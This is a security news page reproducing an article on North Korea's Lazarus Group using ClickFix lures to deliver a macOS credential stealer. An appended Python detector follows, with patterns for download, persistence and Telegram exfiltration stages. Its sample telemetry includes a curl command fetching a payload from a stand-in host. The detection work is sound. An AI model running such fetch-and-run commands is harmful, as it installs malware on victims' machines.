Security News

Cybersecurity news aggregator

HIGH | Attacks | Dark Reading

North Korea's Lazarus Targets macOS Users via ClickFix

The Lazarus Group is using the ClickFix social engineering technique, which tricks users into visiting a fake website and downloading a malicious update, to deploy novel macOS malware for initial access and data theft. The article does not provide a CVSS score, specific affected macOS versions, a fixed version, or a technical workaround.

North Korea's Lazarus Targets macOS Users via ClickFix

Lazarus continues leveraging ClickFix for initial access and data theft, in this case against Mac-centric organizations and their high-value leaders.
Alexander Culafi, Senior News Writer, Dark Reading | April 24, 2026 | 4 Min Read

North Korea's Lazarus Group is using ClickFix attacks to launch cyberattacks using novel macOS malware. That's according to security vendor Any.Run, which on April 21 published research concerning a new nation-state threat campaign. Authored by offensive security expert and Birmingham Cyber Arms founder Mauro Eldritch, the report covers a wave of ClickFix attacks targeting organizations, used to distribute a range of malware. This latest research focuses primarily on a newly identified macOS malware kit that is currently being leveraged in the wild.

ClickFix is a social engineering technique that rose to prominence over the past year or so. A threat actor tricks the victim into visiting attacker-operated infrastructure, such as a website masquerading as a fake Zoom meeting. When the victim reaches the Web page, they are told there are technical issues that can only be resolved if they update their software. The attacker usually instructs the victim to run malicious code, either by copying and pasting a command (on Windows) or by downloading and opening a file that contains the code (typically on macOS).

ClickFix has been a favorite tactic of North Korean threat actors lately. Entities like Lazarus Group use it for initial access, with the ultimate goal of stealing cryptocurrency or intellectual property, or of conducting espionage. In this latest campaign, Lazarus Group is targeting FinTech, cryptocurrency, and high-value leaders in organizations with a substantial reliance on macOS devices.

The Complete macOS Malware Attack Chain

According to Eldritch, an attacker contacts a business leader through Telegram, often by using a compromised account belonging to a colleague or contact known to the target. The attacker sends the target a fake Zoom, Microsoft Teams, or Google Meet invitation to set up a conversation under the pretense of a business opportunity. North Korean actors have also used a potential job offer as a lure. The target joins the call and is prompted to enter a command to fix connection issues.

Because the command is entered by the user, many traditional security controls remain untriggered. And because users are conditioned to agree to actions like updating software, techniques like ClickFix might not raise as many red flags for the user as a traditional phishing email, especially when the attacker uses a business meeting to lower the target's guard ahead of time.

Then, "the operation is focused on extracting business value as quickly as possible," the blog post read. "The attacker collects credentials, browser sessions, and system-stored secrets, including macOS Keychain data." Such assets can then provide access to corporate systems, software-as-a-service (SaaS) platforms, and financial resources, Any.Run added.

Once the user enters the command and connects to attacker infrastructure, malware is downloaded as a macOS application .bin file under an unassuming name, like "teamsSDK.bin." This application installs the second-stage binary and includes additional ways of gaining the user's trust, such as a message saying the software has been updated. The next binary is a system profiler that connects to attacker-hosted command-and-control (C2) infrastructure. This is followed by a persistence mechanism that re-invokes the malware kit at every login, before the primary component, a stealer named "macrasv2," is loaded. The stealer stages previously collected data such as browser extension data, stored browser credentials and cookies, and macOS Keychain entries, consolidates it into a temporary directory, and exfiltrates it through Telegram. Macrasv2 then runs a self-deletion script, and the infection chain is complete.

While many North Korean state-sponsored attacks are sophisticated in nature, Eldritch noted that macrasv2 is "badly written." Several components remain either unimplemented or incorrectly implemented, while some components enter "infinite loops that may expose its presence due to system resource starvation." The malware also exhibits multiple operational security weaknesses, including exposed Telegram bot tokens and C2 endpoints with missing authentication.

How to Avoid ClickFix Compromise

While Any.Run's blog contains indicators of compromise, it must also be noted that no matter how sophisticated an attack chain may seem, ClickFix only works if the end user runs a command or downloads a file. As such, the best way for organizations to combat ClickFix is to educate leaders and employees on how the technique works and why it succeeds, and not to run suspicious commands or open files as a means of solving connectivity problems.

Dark Reading has reached out to Any.Run for additional comment.

About the Author

Alexander Culafi, Senior News Writer, Dark Reading. Alex is an award-winning writer, journalist, and podcast host based in Boston. After cutting his teeth writing for independent gaming publications as a teenager, he graduated from Emerson College in 2016 with a Bachelor of Science in journalism. He has previously been published on VentureFizz, Search Security, Nintendo World Report, and elsewhere. In his spare time, Alex hosts the weekly Nintendo podcast Talk Nintendo Podcast and works on personal writing projects, including two previously self-published science fiction novels.
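Because the chain above leaves a recognisable sequence on the endpoint (a command pasted into Terminal that fetches from a URL, an unfamiliar .bin executing, a login persistence entry being written, and outbound contact with the Telegram API), a defender can score telemetry for that sequence. The following Python is an added example, not code from Dark Reading or Any.Run; the event schema, the LaunchAgents path assumed as the login-persistence location, and the sample events are constructed assumptions, not real EDR data.

```python
import re
from typing import Iterable, Optional
# Heuristic stage patterns (assumed; tune to your own telemetry)
FETCH_RE = re.compile(r"\b(curl|wget)\b.*https?://", re.I)
BIN_RE = re.compile(r"\.bin$", re.I)
PERSIST_RE = re.compile(r"/Library/LaunchAgents/[^/]+\.plist$")  # assumed login-persistence path
TELEGRAM_RE = re.compile(r"(^|\.)api\.telegram\.org(:\d+)?$", re.I)

def classify(event: dict) -> Optional[str]:
    """Map one telemetry event to a ClickFix stage name, or None if it matches nothing."""
    kind = event.get("type")
    if kind == "process":
        if event.get("parent") == "Terminal" and FETCH_RE.search(event.get("cmdline", "")):
            return "user_fetch"  # stage 1: the victim pastes a download command into Terminal
        if BIN_RE.search(event.get("image", "")):
            return "bin_exec"  # stage 2: the fetched .bin payload runs
    elif kind == "file_write" and PERSIST_RE.search(event.get("path", "")):
        return "persistence"  # stage 3: the kit is re-invoked at every login
    elif kind == "network" and TELEGRAM_RE.search(event.get("dest", "")):
        return "telegram_egress"  # stage 4: staged data leaves via Telegram
    return None

def detect_clickfix(events: Iterable[dict]) -> dict:
    """Return the stages seen (in first-occurrence order) and a verdict."""
    stages = []
    for ev in events:
        stage = classify(ev)
        if stage and stage not in stages:
            stages.append(stage)
    # Verdict: the chain starts with a user-typed fetch and shows at least two later stages
    suspicious = stages[:1] == ["user_fetch"] and len(stages) >= 3
    return {"stages": stages, "suspicious": suspicious}

# Constructed sample telemetry modelled on the chain described in the article
CHAIN_EVENTS = [
    {"type": "process", "parent": "Terminal", "image": "/bin/zsh",
     "cmdline": "curl -sL https://meeting-fix.example/update -o /tmp/teamsSDK.bin"},
    {"type": "process", "parent": "zsh", "image": "/tmp/teamsSDK.bin", "cmdline": "/tmp/teamsSDK.bin"},
    {"type": "file_write", "path": "/Users/exec/Library/LaunchAgents/com.teams.update.plist"},
    {"type": "network", "dest": "api.telegram.org:443"},
]
# Constructed benign activity: a developer fetching a script, a vendor installer adding a LaunchAgent
BENIGN_EVENTS = [
    {"type": "process", "parent": "Terminal", "image": "/bin/zsh",
     "cmdline": "curl -sL https://get.example.org/install.sh -o install.sh"},
    {"type": "file_write", "path": "/Users/dev/Library/LaunchAgents/com.vendor.agent.plist"},
]
if __name__ == "__main__":
    print(detect_clickfix(CHAIN_EVENTS))  # suspicious: True
    print(detect_clickfix(BENIGN_EVENTS))  # suspicious: False
```

A single stage on its own (a developer using curl, an installer writing a LaunchAgent) is deliberately not flagged; the verdict requires the user-initiated fetch followed by later stages of the chain.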